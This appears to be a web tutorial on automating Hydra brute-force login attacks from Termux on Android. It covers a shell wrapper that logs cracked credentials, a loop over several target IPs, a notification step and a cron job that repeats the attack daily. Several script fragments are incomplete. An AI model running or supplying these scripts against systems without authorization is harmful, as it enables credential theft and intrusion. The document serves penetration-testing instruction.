Automating Network Security Attacks: Scripting Brute-Force Tests in Termux

Automating Network Security Attacks Scripting Brute-Force Tests in Termux
Automating Network Security Attacks Scripting Brute-Force Tests in Termux

In the world of network security, ensuring that systems are resistant to brute-force attacks is essential. Hydra, a powerful tool for performing brute-force attacks, is widely used in penetration testing to identify weak login credentials. By automating Hydra attacks in Termux, you can efficiently test multiple credentials, saving time and ensuring comprehensive security assessments. This guide will walk you through automating these attacks, allowing you to streamline your network security testing process.

If you haven’t installed Hydra yet, follow this guide to install Hydra in Termux.

Note: This tutorial is intended solely for ethical purposes in testing the strength of login systems in authorized environments. Unlawful use of these techniques is illegal and punishable by law.

Table of Contents


Before diving into automation, ensure the following:

  1. Termux is installed on your Android device.
  2. Hydra is installed (pkg install hydra).
  3. Basic knowledge of shell scripting.
  4. You have proper authorization for testing the target system.

For an extra layer of security, consider following some tips for securing your Termux environment.

Step 1: Setting Up Hydra for Network Security Tests

For network security testing, Hydra’s core command looks like this:

hydra -l <username> -P <password_list> <protocol>://<target_ip>

This command attempts to brute-force the login credentials for a specific protocol (like FTP, SSH) on a target IP. In this article, we will automate the process through a shell script to run multiple tests efficiently.

For more detailed information, refer to the official Hydra documentation.

Step 2: Creating a Script for Automated Network Security Tests

To automate your network security tests, follow these steps:

Create a shell script in Termux:


Write the following script inside the file:


# Variables

# Automating Hydra
echo "Starting Hydra attack for network security on $protocol://$target_ip"
hydra -l $username -P $password_list $protocol://$target_ip -V -t 4 > hydra_output.txt

# Output check
if grep "login:" hydra_output.txt; then
    echo "Success! Credentials found."
    grep "login:" hydra_output.txt
    echo "No valid credentials found."

This script simplifies your network security tests by automatically running Hydra and logging the output to a file.

Step 3: Running the Script

Once the script is ready, you can run it:


The script will execute the brute-force attack and check if successful credentials are found in the output. For example, if the attack is successful, the output file will contain:

[22][ssh] host:   login: admin   password: pass123

This helps in conducting fast, automated network security assessments without manually running multiple tests.

Step 4: Enhancing the Script for Advanced Network Security Testing

You can enhance the script to support multiple targets or send notifications when credentials are found, making it more useful in network security scenarios.

Loop through multiple targets: To automate attacks on several IP addresses, modify the script:

targets=("" "")

for ip in "${targets[@]}"; do
    echo "Running Hydra attack on $ip"
    hydra -l $username -P $password_list $protocol://$ip -V > hydra_output_$ip.txt

Send notifications: With Termux, you can use termux-notification to notify you when the attack completes:

termux-notification --title "Hydra Attack" --content "Hydra brute-force attack completed on $target_ip."

Step 5: Scheduling Network Security Tests

Automating network security tests can also involve scheduling regular brute-force assessments. You can use cron in Termux to schedule the script:

echo "0 0 * * * /data/data/com.termux/files/home/" | crontab -

This command will run the script daily at midnight, automating network security testing without manual intervention.

For more on keeping your tests secure, explore network security best practices.


Automating Hydra brute-force tests in Termux is an efficient way to enhance your network security efforts. By using a simple shell script, you can save time, automate repetitive tasks, and ensure thorough security assessments across multiple systems. With further customization, you can automate tests across networks, schedule periodic security checks, and receive notifications upon success.

Ensure you are testing only within authorized environments to avoid legal issues and contribute positively to the field of network security.

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